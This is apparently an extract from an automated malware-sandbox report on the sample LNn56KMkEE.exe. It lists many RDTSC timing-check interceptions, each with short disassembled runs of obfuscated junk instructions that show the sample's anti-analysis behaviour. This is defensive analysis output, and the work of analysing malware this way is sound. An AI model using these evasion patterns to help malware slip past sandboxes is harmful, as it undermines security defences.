                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6A8020 second address: 6A8029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AA108 second address: 6AA10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AA10E second address: 6AA112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AA112 second address: 6AA118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AA118 second address: 6AA128 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2ADCE7BD72h 0x00000008 jne 00007F2ADCE7BD66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6ABFED second address: 6AC076 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 06AEEFF6h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F2ADCE78B38h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1B47h], ecx 0x0000002f call 00007F2ADCE78B39h 0x00000034 jmp 00007F2ADCE78B42h 0x00000039 push eax 0x0000003a jmp 00007F2ADCE78B42h 0x0000003f mov eax, dword ptr [esp+04h] 0x00000043 jmp 00007F2ADCE78B46h 0x00000048 mov eax, dword ptr [eax] 0x0000004a js 00007F2ADCE78B54h 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC076 second address: 6AC07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC3BF second address: 6AC3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC3C3 second address: 6AC3D1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2ADCE7BD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC3D1 second address: 6AC3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC3D5 second address: 6AC3D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC3D9 second address: 6AC3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F2ADCE78B36h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC3EB second address: 6AC3EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC3EF second address: 6AC3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AC61E second address: 6AC623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6ACB97 second address: 6ACBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2ADCE78B44h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6ACBB7 second address: 6ACBBD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6ACC28 second address: 6ACC2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AD193 second address: 6AD198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AD198 second address: 6AD1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2ADCE78B36h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F2ADCE78B38h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b js 00007F2ADCE78B3Ch 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AD1CF second address: 6AD1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AE003 second address: 6AE022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2ADCE78B47h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AE022 second address: 6AE042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F2ADCE7BD68h 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6AE042 second address: 6AE05E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2ADCE78B48h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B082B second address: 6B0831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B11EF second address: 6B121A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2ADCE78B48h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 ja 00007F2ADCE78B36h 0x00000017 pop esi 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B121A second address: 6B1224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F2ADCE7BD66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B4CDB second address: 6B4CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B5331 second address: 6B5335 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B5598 second address: 6B55A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F2ADCE78B36h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B64EB second address: 6B64F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B64F1 second address: 6B64F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6B9874 second address: 6B987A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6BAB0D second address: 6BAB27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007F2ADCE78B44h 0x00000011 pushad 0x00000012 jo 00007F2ADCE78B36h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6BBAAB second address: 6BBAAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6BBAAF second address: 6BBAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6BDB19 second address: 6BDB3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F2ADCE7BD6Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6BBAB5 second address: 6BBAD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F2ADCE78B36h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F2ADCE78B40h 0x00000017 jmp 00007F2ADCE78B3Ah 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C10D8 second address: 6C10F1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2ADCE7BD6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C11BB second address: 6C11CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jng 00007F2ADCE78B44h 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F2ADCE78B36h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C227D second address: 6C2283 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C2283 second address: 6C228D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2ADCE78B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C228D second address: 6C2291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C13DB second address: 6C13DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C13DF second address: 6C13F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C13F8 second address: 6C13FD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C33C7 second address: 6C343A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F2ADCE7BD68h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 sub di, 6ABBh 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F2ADCE7BD68h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 mov bx, 19C0h 0x0000004a pushad 0x0000004b jmp 00007F2ADCE7BD6Ah 0x00000050 mov bl, 73h 0x00000052 popad 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 je 00007F2ADCE7BD6Ch 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C343A second address: 6C343E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C2503 second address: 6C2508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C2508 second address: 6C250E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C250E second address: 6C2512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C2512 second address: 6C2521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C2521 second address: 6C2525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C2525 second address: 6C252B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C252B second address: 6C2535 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2ADCE7BD6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C4546 second address: 6C4550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F2ADCE78B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C4550 second address: 6C4564 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2ADCE7BD66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C4564 second address: 6C4569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C6375 second address: 6C6381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C6381 second address: 6C63DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F2ADCE78B38h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 and bx, 0512h 0x00000028 and edi, dword ptr [ebp+122D29FCh] 0x0000002e push 00000000h 0x00000030 jmp 00007F2ADCE78B3Eh 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D1887h], ebx 0x0000003d mov bx, si 0x00000040 xchg eax, esi 0x00000041 jne 00007F2ADCE78B59h 0x00000047 push eax 0x00000048 push edx 0x00000049 jnc 00007F2ADCE78B36h 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C63DE second address: 6C6408 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE7BD77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F2ADCE7BD6Ch 0x00000012 jns 00007F2ADCE7BD66h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C7410 second address: 6C7414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6C7414 second address: 6C7422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F2ADCE7BD66h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6CF84C second address: 6CF859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F2ADCE78B36h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6CF27B second address: 6CF283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6CF283 second address: 6CF290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6CF290 second address: 6CF294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6CF294 second address: 6CF298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6CF3EF second address: 6CF40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2ADCE7BD66h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d pop esi 0x0000000e pushad 0x0000000f jmp 00007F2ADCE7BD6Bh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D3774 second address: 6D3778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D3778 second address: 6D377E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D377E second address: 6D378D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D378D second address: 6D37B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F2ADCE7BD7Ch 0x00000014 jmp 00007F2ADCE7BD76h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D37B7 second address: 6D37BC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D37BC second address: 6D37D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push ecx 0x0000000a jnl 00007F2ADCE7BD68h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D37D9 second address: 6D37DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D37DD second address: 6D37E3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 6D385D second address: 6D3864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 715325 second address: 715333 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F2ADCE78B36h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 715333 second address: 715339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 715339 second address: 715351 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F2ADCE78B3Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 71857B second address: 718590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 ja 00007F2ADCE7BD66h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 718D69 second address: 718D82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2ADCE78B45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 718D82 second address: 718D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 718D88 second address: 718D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 721BFA second address: 721C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push ebx 0x00000008 jng 00007F2ADCE7BD6Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F2ADCE7BD66h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LNn56KMkEE.exeRDTSC instruction interceptor: First address: 71FE6F second address: 71FE89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2ADCE78B44h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
